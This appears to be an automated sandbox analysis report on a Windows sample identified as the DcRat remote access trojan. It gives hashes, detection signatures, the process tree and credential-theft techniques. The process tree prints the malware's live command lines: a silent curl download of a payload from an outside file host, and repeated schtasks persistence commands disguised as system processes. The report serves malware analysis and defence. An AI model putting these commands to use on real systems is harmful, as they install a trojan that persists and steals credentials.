Analysis
-
max time kernel
117s -
max time network
126s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2024 06:34
Static task
static1
Behavioral task
behavioral1
Sample
3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe
Resource
win7-20241010-en
General
-
Target
3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe
-
Size
1.2MB
-
MD5
e5a4be0eb47c462ad72240167b00d6eb
-
SHA1
09793e20889984c4d8f18385052baa82202afca8
-
SHA256
3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15
-
SHA512
6c2445109f25acb7d8fb545b66db590ba2c4bcc0237829ce99f7bf0c4f135e37b1b5b4afba2477b807bf36c529d679479265fec7657f89faf052cf532a2e2bd1
-
SSDEEP
12288:F0GtwVUTytoIn41c6iHKnkUxCj2AqeMQmwWe0ZQyRWkhuq3nbep3+bKDZhW/lc4q:ptDZcpHKnkuGKFplpC+bKlAtc06z
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4176 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2320 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4432 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4892 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 404 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4116 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2112 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2736 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4736 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4692 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2024 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2696 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4268 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2460 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2196 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1912 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4440 2228 schtasks.exe 88 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5112 2228 schtasks.exe 88 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation 3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation physmeme.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation Medal.exe -
Executes dropped EXE 3 IoCs
pid Process 3528 physmeme.exe 2164 Medal.exe 4584 taskhostw.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Internet Explorer\ja-JP\sihost.exe Medal.exe File created C:\Program Files (x86)\Internet Explorer\ja-JP\66fc9ff0ee96c2 Medal.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Speech\physmeme.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language physmeme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2576 PING.EXE -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings physmeme.exe Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings Medal.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2576 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4440 schtasks.exe 1912 schtasks.exe 2112 schtasks.exe 2736 schtasks.exe 4692 schtasks.exe 2460 schtasks.exe 2320 schtasks.exe 4432 schtasks.exe 4892 schtasks.exe 4116 schtasks.exe 4176 schtasks.exe 4736 schtasks.exe 2024 schtasks.exe 2696 schtasks.exe 4268 schtasks.exe 2196 schtasks.exe 5112 schtasks.exe 404 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 2164 Medal.exe 4584 taskhostw.exe 4584 taskhostw.exe 4584 taskhostw.exe 4584 taskhostw.exe 4584 taskhostw.exe 4584 taskhostw.exe 4584 taskhostw.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2164 Medal.exe Token: SeDebugPrivilege 4584 taskhostw.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 1656 wrote to memory of 3064 1656 3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe 82 PID 1656 wrote to memory of 3064 1656 3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe 82 PID 1656 wrote to memory of 3536 1656 3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe 83 PID 1656 wrote to memory of 3536 1656 3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe 83 PID 3536 wrote to memory of 1132 3536 cmd.exe 84 PID 3536 wrote to memory of 1132 3536 cmd.exe 84 PID 1656 wrote to memory of 3528 1656 3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe 90 PID 1656 wrote to memory of 3528 1656 3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe 90 PID 1656 wrote to memory of 3528 1656 3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe 90 PID 3528 wrote to memory of 5028 3528 physmeme.exe 91 PID 3528 wrote to memory of 5028 3528 physmeme.exe 91 PID 3528 wrote to memory of 5028 3528 physmeme.exe 91 PID 5028 wrote to memory of 700 5028 WScript.exe 94 PID 5028 wrote to memory of 700 5028 WScript.exe 94 PID 5028 wrote to memory of 700 5028 WScript.exe 94 PID 700 wrote to memory of 2164 700 cmd.exe 96 PID 700 wrote to memory of 2164 700 cmd.exe 96 PID 2164 wrote to memory of 3936 2164 Medal.exe 115 PID 2164 wrote to memory of 3936 2164 Medal.exe 115 PID 3936 wrote to memory of 2336 3936 cmd.exe 117 PID 3936 wrote to memory of 2336 3936 cmd.exe 117 PID 3936 wrote to memory of 2576 3936 cmd.exe 118 PID 3936 wrote to memory of 2576 3936 cmd.exe 118 PID 3936 wrote to memory of 4584 3936 cmd.exe 121 PID 3936 wrote to memory of 4584 3936 cmd.exe 121 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe"C:\Users\Admin\AppData\Local\Temp\3a2f1bf0b03ca3faaa196da40be33a132949957dabdb94f6be65c09dbdf9ec15.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1656 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:3064
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3536 -
C:\Windows\system32\curl.execurl --silent https://files.catbox.moe/t3twl8.bin --output C:\Windows\Speech\physmeme.exe3⤵
- Drops file in Windows directory
PID:1132
-
-
-
C:\Windows\Speech\physmeme.exe"C:\Windows\Speech\physmeme.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3528 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Medal\LziQ5Qlyzu0f0C5NtfHJq0w.vbe"3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5028 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Medal\Fua65ZRdZNJ5OJAqSXb7513NtPonCq4dK3Ubpg1B.bat" "4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Medal\Medal.exe"C:\Medal/Medal.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XZYvCKrY72.bat"6⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
C:\Windows\system32\chcp.comchcp 650017⤵PID:2336
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2576
-
-
C:\Medal\taskhostw.exe"C:\Medal\taskhostw.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4584
-
-
-
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4176
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2320
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsassl" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\lsass.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4432
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 10 /tr "'C:\Medal\TextInputHost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4892
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHost" /sc ONLOGON /tr "'C:\Medal\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:404
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "TextInputHostT" /sc MINUTE /mo 14 /tr "'C:\Medal\TextInputHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4116
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\upfc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2112
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\upfc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4736
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\sihost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4692
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "sihosts" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Internet Explorer\ja-JP\sihost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2696
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 8 /tr "'C:\Medal\taskhostw.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4268
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostw" /sc ONLOGON /tr "'C:\Medal\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2460
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "taskhostwt" /sc MINUTE /mo 9 /tr "'C:\Medal\taskhostw.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2196
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 9 /tr "'C:\Medal\Medal.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Medal" /sc ONLOGON /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "MedalM" /sc MINUTE /mo 14 /tr "'C:\Medal\Medal.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5112
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
63B
MD5e24619181276af563705f4b1bed29490
SHA1fddac27290319f69543f5330fe97c122a8a01376
SHA256eee937e02edcd36de3ed7658c9ad9d79844502c8553a7c244b2b154aa9ffec05
SHA5121898a5e2a52f2f34466dfd9e1b1149b36052874b6be432dd9301ecfa6bc3a964dca6980b8db54ddcf8ef24a95792efcaffeb09aceb7a04304a0d18f4d0ce0591
-
Filesize
224B
MD596d43070e1e39d421c53a2f8dca13fc6
SHA107417cccceddbf8d5f5b48dec0b2e08d53a4754f
SHA2560dab986e5c533631946e27cdbb5147e68b9eb3008c1add60d21a59cd7d964314
SHA5129fc0ee5ac42bca7c7ee7584baa5be6907fc750378d037d56e075a21c4fe8eaeb3efac3e9fb6087a70a6ad01dcebf05d2462f2463daa8063b4047c11e5364d398
-
Filesize
1.8MB
MD54f66bbfed3a524398bd0267ed974ccbc
SHA1b2567397dc823412d87a23428c7833ff74586b7d
SHA256fa05b7f28eb1df0447998b89a08aa96453b0f3240c31489900d178862eaa80d8
SHA512bc4de61adb5f56c66043a2617ebfcc9f4e82d36e48dbdc9178695f9466d554eb364d69829490ff43100e8cb457ce7e78b2e277a3cf1733edf32c0154e6f56d9f
-
Filesize
150B
MD5ee929420b28005761cc1696b37719a0d
SHA163632462e7022d1fefb42bb38a12fc0959e575df
SHA256bfa883b5b86e00b1390bccd50fed260ca7f90843b6a29832ef403ba8ed283a74
SHA512aac80ab797432debec236fdc4eb28b35b93f741ec8849904268f8021356e8fb126f313bceb5b8ab1fd11f54c861b93476b793f825d0b3df0ea2819e2813b564b
-
Filesize
2.1MB
MD5f4620c0afa8e21897509b2e7215097f5
SHA1af216ca6105e271a3fb45a23c10ee7cf3158b7e1
SHA2568daf7dcdf256d7de40d33e5550dc5e8bbf887b8c4b7f49c79a15c96dad867f82
SHA51268b875acc06d9c3796f49377b5b25a5e8b9a380221eea59e4274249ca7d2bff10c3fc5edf50eae5da726afea882e0e777af86af25be7b57c8fbfd70448d8d7dd